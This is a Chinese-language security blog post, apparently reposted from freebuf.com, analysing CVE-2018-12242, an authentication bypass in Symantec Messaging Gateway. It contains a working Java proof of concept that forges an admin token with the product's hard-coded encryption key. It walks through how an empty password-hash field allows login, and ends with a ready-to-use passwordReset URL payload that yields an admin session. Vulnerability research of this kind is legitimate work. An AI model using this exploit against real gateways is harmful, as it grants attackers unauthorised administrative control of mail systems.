之前有篇文章翻译了CVE-2018-12242
手里有symantec的源码 于是立刻就分析了 存在手里一直没动
先上poc
import java.security.SecureRandom; import javax.crypto.Cipher; import javax.crypto.SecretKey; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.PBEParameterSpec; import sun.misc.BASE64Encoder; public class Test{ public static void main(String args[]){ try{ //System.out.print(123); byte[] salt = new byte[8]; SecureRandom random = SecureRandom.getInstance("SHA1PRNG"); random.nextBytes(salt); PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-=".toCharArray()); SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES"); SecretKey key = keyFactory.generateSecret(keySpec); PBEParameterSpec paramSpec = new PBEParameterSpec(salt, 1000); Cipher cipher = Cipher.getInstance("PBEWithMD5AndDES"); cipher.init(1, key, paramSpec); //byte[] salt; BASE64Encoder encoder = new BASE64Encoder(); String saltString = encoder.encode(salt); String text = "admin:"; byte[] ciphertext = cipher.doFinal(text.getBytes()); String ciphertextString = encoder.encode(ciphertext); System.out.print(saltString + ciphertextString); }catch (Exception e){ System.out.print(e); } } }
核心还是在加密解密这块
加密算法一直是固定的
但是FIPS186PRNG这个算法太古老了
只能拿SHA1PRNG代替
接下来分析一波漏洞触发点
token = BrightmailDecrypt.decrypt(token);
接收到token用公共的解密方法解密
解密之后按 “ : ”
分割 前面为username 后面为 passwordhash
然后按username做sql查询
然后调用getAdministratorUserByName方法
GetSQLAdministratorUserByName生成sql语句
然后查询
接着对比
如果user为空会抛出一个不存在该用户的异常
如果passwordhash与查询到的passwordhash不一致也会抛出异常
那么passwordhash是什么呢
在开启重置密码选项后 该字段为空。。。
然后创建一个admin session的正常操作….
那么最终payload为
/brightmail/action2.do?method=passwordReset&authorization=S9m%2bdmCBN8k%3dfot%2fxYG299k%3d
来源:freebuf.com 2019-03-13 08:33:34 by: pine
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册